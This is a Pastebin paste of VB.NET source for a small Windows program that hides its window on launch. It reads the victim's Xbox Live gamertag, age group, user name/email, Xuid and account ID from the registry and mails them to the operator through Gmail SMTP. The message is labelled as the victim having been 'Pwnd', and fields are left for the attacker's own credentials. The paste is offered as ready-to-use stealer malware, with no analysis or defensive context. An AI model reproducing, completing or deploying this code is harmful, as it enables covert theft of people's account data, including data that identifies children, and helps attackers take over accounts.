Advertisement
Guest User

Untitled

a guest
Jun 11th, 2016
123
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.16 KB | None | 0 0
  1. Imports Microsoft.Win32
  2. Imports System.Net.Mail
  3. Imports System.Net
  4.  
  5. Public Class Form1
  6. Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
  7.  
  8. Me.Hide()
  9.  
  10.  
  11.  
  12.  
  13. Dim mee = "HKEY_CURRENT_USER\SOFTWARE\Microsoft\XboxLive"
  14.  
  15.  
  16.  
  17.  
  18.  
  19. Dim reg = My.Computer.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\XboxLive")
  20.  
  21. My.Computer.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\XboxLive")
  22.  
  23. Dim dunk = My.Computer.Registry.GetValue(mee, "gamertag", Nothing)
  24. Dim dunnk = My.Computer.Registry.GetValue(mee, "AgeGroup", Nothing)
  25. Dim dunnnk = My.Computer.Registry.GetValue(mee, "UserName", Nothing)
  26. Dim dunnnnk = My.Computer.Registry.GetValue(mee, "Xuid", Nothing)
  27. Dim dunnnnnk = My.Computer.Registry.GetValue(mee, "AccountId", Nothing)
  28.  
  29.  
  30.  
  31.  
  32. Dim enter = Environment.NewLine
  33. Dim gmailUser = "GMAILHERE" 'CHANGE THIS CHANGE THIS CHANGE THIS CHANGE THIS CHANGE THIS CHANGE THIS CHANGE THIS CHANGE THIS CHANGE THIS CHANGE THIS CHANGE THIS CHANGE THIS CHANGE THIS
  34.  
  35. Dim gmailPass = "PASSWORDHERE" 'CHANGE THIS CHANGE THIS CHANGE THIS CHANGE THIS CHANGE THIS CHANGE THIS CHANGE THIS CHANGE THIS CHANGE THIS CHANGE THIS CHANGE THIS CHANGE THIS CHANGE THIS
  36.  
  37. Dim toEmail = gmailUser
  38. Dim fromEmail = gmailUser
  39. Dim userName As String = Environment.UserName
  40. Dim computerName As String = Environment.UserName
  41. Dim subject = Environment.UserName + " Just Got Pwnd By You!"
  42.  
  43. Dim body = "You Just Rekted " + Environment.UserName + ", Here's Some Info!" + enter + enter + "GamerTag: " + dunk + enter + enter + "Child Or Adult: " + dunnk + enter + enter + "Email: " + dunnnk + enter + enter + "Xbox ID: " + dunnnnk + enter + enter + "Account ID: " + dunnnnnk + enter + enter + "DONE! Have Fun With This! :D"
  44.  
  45. Dim message As New MailMessage(fromEmail, toEmail, subject, body)
  46. Dim smtp As New SmtpClient("smtp.gmail.com", 587)
  47.  
  48. smtp.EnableSsl = True
  49. smtp.Credentials = New NetworkCredential(gmailUser, gmailPass)
  50.  
  51.  
  52. smtp.Send(message)
  53.  
  54.  
  55. Me.Close()
  56. End Sub
  57. End Class
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement